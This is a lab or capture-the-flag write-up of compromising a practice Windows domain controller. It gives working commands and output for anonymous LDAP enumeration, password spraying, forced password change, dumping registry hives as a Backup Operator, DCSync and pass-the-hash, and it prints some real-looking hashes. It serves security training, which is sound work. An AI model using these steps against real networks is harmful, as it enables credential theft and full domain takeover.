Reconnaissance
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-08 14:10:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-03-07T13:59:12
|_Not valid after: 2025-09-06T13:59:12
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-03-08T14:11:34+00:00
|_ssl-date: 2025-03-08T14:12:13+00:00; -1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
51277/tcp open msrpc Microsoft Windows RPC
51292/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-08T14:11:38
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Based on the exposed ports the target is a Domain Controller and I add baby.vl and babydc.baby.vl to my /etc/host file.
Initial Access
Checking for anonymous access on LDAP works and I can retrieve a list of users and their descriptions via nxc.
$ nxc ldap baby.vl -u '' -p '' --users
LDAP 10.10.66.16 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
LDAP 10.10.66.16 389 BABYDC [+] baby.vl\:
LDAP 10.10.66.16 389 BABYDC [*] Enumerated 9 domain users: baby.vl
LDAP 10.10.66.16 389 BABYDC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.66.16 389 BABYDC Guest <never> 3 Built-in account for guest access to the computer/domain
LDAP 10.10.66.16 389 BABYDC Jacqueline.Barnett 2021-11-21 16:11:03 2
LDAP 10.10.66.16 389 BABYDC Ashley.Webb 2021-11-21 16:11:03 2
LDAP 10.10.66.16 389 BABYDC Hugh.George 2021-11-21 16:11:03 2
LDAP 10.10.66.16 389 BABYDC Leonard.Dyer 2021-11-21 16:11:03 2
LDAP 10.10.66.16 389 BABYDC Connor.Wilkinson 2021-11-21 16:11:08 2
LDAP 10.10.66.16 389 BABYDC Joseph.Hughes 2021-11-21 16:11:08 2
LDAP 10.10.66.16 389 BABYDC Kerry.Wilson 2021-11-21 16:11:08 2
LDAP 10.10.66.16 389 BABYDC Teresa.Bell 2021-11-21 16:14:37 2 Set initial password to <REDACTED>This returns a default password for Teresa.Bell but unfortunately the password does not work anymore. Spraying it against the list of accounts shows another hit on Caroline.Robinson, indicating that the password needs to be changed.
$ nxc smb 10.10.66.16 -u users.txt -p '<REDACTED>' --continue-on-success
SMB 10.10.66.16 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Administrator:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Guest:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\krbtgt:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\dev:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Jacqueline.Barnett:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Ashley.Webb:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Hugh.George:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Leonard.Dyer:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Ian.Walker:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\it:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Connor.Wilkinson:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Joseph.Hughes:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Kerry.Wilson:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Teresa.Bell:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Caroline.Robinson:<REDACTED> STATUS_PASSWORD_MUST_CHANGEThrough changepasswd.py from impacket I perform the password change and can then use the credentials to list the exposed network shares.
$ impacket-changepasswd -newpass 'Helloworld123!' baby.vl/Caroline.Robinson@baby.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of baby.vl\Caroline.Robinson
[*] Connecting to DCE/RPC as baby.vl\Caroline.Robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
$ nxc smb baby.vl -u Caroline.Robinson -p 'Helloworld123!' --shares
SMB 10.10.66.16 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.66.16 445 BABYDC [+] baby.vl\Caroline.Robinson:Helloworld123!
SMB 10.10.66.16 445 BABYDC [*] Enumerated shares
SMB 10.10.66.16 445 BABYDC Share Permissions Remark
SMB 10.10.66.16 445 BABYDC ----- ----------- ------
SMB 10.10.66.16 445 BABYDC ADMIN$ READ Remote Admin
SMB 10.10.66.16 445 BABYDC C$ READ,WRITE Default share
SMB 10.10.66.16 445 BABYDC IPC$ READ Remote IPC
SMB 10.10.66.16 445 BABYDC NETLOGON READ Logon server share
SMB 10.10.66.16 445 BABYDC SYSVOL READ Logon server shareThis allows me to retrieve the first flag through the read access on the C$ share.
Execution
Checking out what group the user Caroline.Robinson is a member of shows Backup Operators. By default members of this group can log in interactively on any workstation or server1.
$ nxc ldap baby.vl -u Caroline.Robinson -p 'Helloworld123!' -M whoami
SMB 10.10.66.16 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
LDAP 10.10.66.16 389 BABYDC [+] baby.vl\Caroline.Robinson:Helloworld123! (Pwn3d!)
WHOAMI 10.10.66.16 389 BABYDC distinguishedName: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
WHOAMI 10.10.66.16 389 BABYDC Member of: CN=it,CN=Users,DC=baby,DC=vl
WHOAMI 10.10.66.16 389 BABYDC Member of: CN=Backup Operators,CN=Builtin,DC=baby,DC=vl
WHOAMI 10.10.66.16 389 BABYDC name: Caroline Robinson
WHOAMI 10.10.66.16 389 BABYDC Enabled: Yes
WHOAMI 10.10.66.16 389 BABYDC Password Never Expires: No
WHOAMI 10.10.66.16 389 BABYDC Last logon: 133859211976451030
WHOAMI 10.10.66.16 389 BABYDC pwdLastSet: 133859211743466518
WHOAMI 10.10.66.16 389 BABYDC logonCount: 0
WHOAMI 10.10.66.16 389 BABYDC sAMAccountName: Caroline.Robinson
$ evil-winrm -i babydc.baby.vl -u 'Caroline.Robinson' -p 'Helloworld123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> hostname
BabyDCPrivilege Escalation
The membership in Backup Operators also allows me to backup any file including the registry hives. There’s a nxc module called backup_operator that automates the process.
$ nxc smb baby.vl -u Caroline.Robinson -p 'Helloworld123!' -M backup_operator
SMB 10.10.66.16 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.66.16 445 BABYDC [+] baby.vl\Caroline.Robinson:Helloworld123!
BACKUP_O... 10.10.66.16 445 BABYDC [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.10.66.16 445 BABYDC Saved HKLM\SAM to \\10.10.66.16\SYSVOL\SAM
BACKUP_O... 10.10.66.16 445 BABYDC Saved HKLM\SYSTEM to \\10.10.66.16\SYSVOL\SYSTEM
BACKUP_O... 10.10.66.16 445 BABYDC Saved HKLM\SECURITY to \\10.10.66.16\SYSVOL\SECURITY
SMB 10.10.66.16 445 BABYDC [*] Copying "SAM" to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SAM"
SMB 10.10.66.16 445 BABYDC [+] File "SAM" was downloaded to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SAM"
SMB 10.10.66.16 445 BABYDC [*] Copying "SECURITY" to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SECURITY"
SMB 10.10.66.16 445 BABYDC [+] File "SECURITY" was downloaded to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SECURITY"
SMB 10.10.66.16 445 BABYDC [*] Copying "SYSTEM" to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SYSTEM"
SMB 10.10.66.16 445 BABYDC [+] File "SYSTEM" was downloaded to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SYSTEM"
BACKUP_O... 10.10.66.16 445 BABYDC Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
BACKUP_O... 10.10.66.16 445 BABYDC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.10.66.16 445 BABYDC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.10.66.16 445 BABYDC $MACHINE.ACC:plain_password_hex:<REDACTED>
BACKUP_O... 10.10.66.16 445 BABYDC $MACHINE.ACC: <REDACTED>
BACKUP_O... 10.10.66.16 445 BABYDC dpapi_machinekey:<REDACTED>
dpapi_userkey:<REDACTED>
BACKUP_O... 10.10.66.16 445 BABYDC NL$KM:<REDACTED>
SMB 10.10.66.16 445 BABYDC [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 STATUS_LOGON_FAILURE
BACKUP_O... 10.10.66.16 445 BABYDC [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 10.10.66.16 445 BABYDC [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"The hash for the Administrator can’t be used to login because it’s only the local account, but with the help of the NTLM hash of the Domain Controller I can retrieve all the passwords from the domain by using DCSync.
$ impacket-secretsdump -hashes :bf<REDACTED>fc 'BABY.VL/BABYDC$@baby.vl'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee<REDACTED>3d:::
<SNIP>
[*] Cleaning up...
$ impacket-wmiexec -hashes :ee<REDACTED>3d Administrator@baby.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
BabyDC
C:\>whoami
baby\administratorAttack Path
flowchart TD subgraph "Initial Access" A(Anonymous Bind on LDAP) -->|Retrieve Users| B(Name & Description) B -->|Password in Description| C(Valid initial Password) C -->|Password Spraying| D(Valid Credentials) end subgraph "Execution" D -->|Membership in Backup Operators| E(Access as Caroline.Robinson) end subgraph "Privilege Escalation" E -->|Backup of Registry Hives| F(Hash for BABYDC$) F -->|DCSync| G(NTLM Hash for Administrator) end